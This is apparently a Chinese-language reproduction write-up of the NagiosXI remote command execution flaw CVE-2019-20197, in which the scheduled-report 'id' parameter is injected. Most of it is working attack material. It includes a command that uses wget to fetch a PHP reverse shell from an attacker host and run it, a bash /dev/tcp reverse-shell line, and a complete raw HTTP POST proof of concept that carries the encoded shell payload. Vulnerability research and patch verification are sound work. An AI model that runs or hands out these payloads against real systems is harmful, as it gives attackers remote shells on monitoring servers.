NagiosXI 远程命令执行(CVE-2019-20197)—zhangy1da

简介

Nagios是一个流行的电脑系统和网络监控程序，它检测主机和服务，当异常发生和解除时能提醒用户。nagiosxi是一个企业级服务器和网络监控软件。

影响范围

NagiosXI<=5.6.9

安装

源码下载地址：https://assets.nagios.com/downloads/nagiosxi/versions.php

复现过程

漏洞验证

报告->安排本报告

生成新的计划任务，其中id参数由于未做过滤导致rce。

使用dnslog进行漏洞验证

根据结果即可判断漏洞存在 

反弹shell

kali使用python搭建httpserver

python -m SimpleHTTPServer 80

使用weget命令下载kali生成的反弹shell并执行

aa";wget http://192.168.50.161/shell.php -O /tmp/a.php; php /tmp/a.php;

即可收到meterpreter会话

也可使用bash来反弹shell

id=a";/bin/bash -i > /dev/tcp/192.168.50.161/2334 0<&1

POC

POST /nagiosxi/includes/components/scheduledreporting/schedulereport.php HTTP/1.1
Host: 192.168.50.159:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756
Origin: http://192.168.50.159:8080
Connection: close
Referer: http://192.168.50.159:8080/nagiosxi/includes/components/scheduledreporting/schedulereport.php?name=Availability%20Report&url=%2Fnagiosxi%2Freports%2Favailability.php%3Freportperiod%3Dlast24hours%26startdate%3D%26enddate%3D%26host%3D%26service%3D%26hostgroup%3D%26servicegroup%3D%26advanced%3D0%26assumeinitialstates%3Dyes%26assumestateretention%3Dyes%26assumestatesduringdowntime%3Dyes%26includesoftstates%3Dno%26assumedhoststate%3D3%26assumedservicestate%3D6%26timeperiod%3D
Cookie: nagiosxi=v6q18j321trpit7gtbld58srb2
Upgrade-Insecure-Requests: 1

nsp=307f3af3dedb339f45fcae2e6646c069d2670e13bf1c638e7df40d5748113d4c&update=1&id=a%22%3B%2fbin%2fbash%20-i%20%3E%20%2fdev%2ftcp%2f192.168.50.167%2f2334%200%3C%261%20%0A&type=&url=%2Fnagiosxi%2Freports%2Favailability.php%3Freportperiod%3Dlast24hours%26startdate%3D%26enddate%3D%26host%3D%26service%3D%26hostgroup%3D%26servicegroup%3D%26advanced%3D0%26assumeinitialstates%3Dyes%26assumestateretention%3Dyes%26assumestatesduringdowntime%3Dyes%26includesoftstates%3Dno%26assumedhoststate%3D3%26assumedservicestate%3D6%26timeperiod%3D&wurl=&userid=0&length=0&sendonce=0&name=Availability+Report&frequency=Daily&hour=09&minute=00&ampm=AM&dayofweek=1&dayofmonth=1&attachments%5Bpdf%5D=on&recipients=root%40localhost&subject=Availability+Report&body=&updateButton=

参考链接

https://code610.blogspot.com/2019/12/postauth-rce-in-latest-nagiosxi.html